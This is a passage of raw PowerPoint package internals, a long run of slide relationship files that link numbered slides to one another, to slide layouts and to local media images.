<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId2"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428.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slide" Target="slide25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434.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image433.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide321.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide355.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide323.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide345.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.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slide" Target="slide339.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide251.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide334.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide370.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide327.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide362.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide322.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slide" Target="slide321.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32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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide324.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436.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image439.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38.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image437.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image441.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide325.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image446.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image445.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44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image443.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image442.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image448.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image447.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide328.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452.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51.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32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55.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.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459.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58.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide331.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463.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62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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66.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image468.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image467.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide334.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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide335.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472.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71.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image470.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image469.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide336.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476.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image473.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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4.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321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide338.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image481.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.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79.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image477.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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4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72.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image483.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image482.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide341.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image473.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide321.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image484.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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4.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321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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86.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image485.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image477.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide344.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image491.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.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89.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide346.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495.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94.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image493.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image492.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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98.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image497.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image496.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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501.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image500.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image499.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide349.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image506.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image505.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504.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image503.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image502.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image507.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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70.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide350.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image508.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image514.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image513.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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4.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321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide353.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518.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517.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image516.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image515.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image517.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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image" Target="../media/image519.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide357.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image473.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image521.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide321.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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4.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321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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523.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image522.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image521.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360.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489.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525.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image486.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image524.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image527.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image526.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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slide" Target="slide321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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530.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image529.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image528.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide364.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534.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533.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image532.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image531.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image535.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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4.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321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image536.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image477.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide368.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540.bmp"/><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539.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image538.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image537.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image542.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image541.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37.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37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09.jpe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321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image544.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image543.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image546.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image545.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide373.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image473.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide321.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image547.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide374.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4.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321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide375.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image552.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image551.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550.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image549.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image548.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image553.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide380.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide382.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.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251.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide389.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide381.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slide" Target="slide380.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38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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide383.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image555.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image557.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image556.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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80.xml"/><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559.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image558.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide385.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475.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image473.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image561.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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4.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380.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide387.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565.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image564.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image563.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image562.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide388.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569.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image568.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image567.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image566.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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90.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573.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image572.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image571.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image570.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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80.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image575.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image574.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide392.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578.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image577.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image576.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image561.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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80.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334.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slide" Target="slide380.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide395.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582.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image581.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image580.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image579.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide396.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586.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image585.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image584.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image583.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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slide" Target="slide42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slide" Target="slide380.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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80.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8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4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slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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80.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80.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8.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide300.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03.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
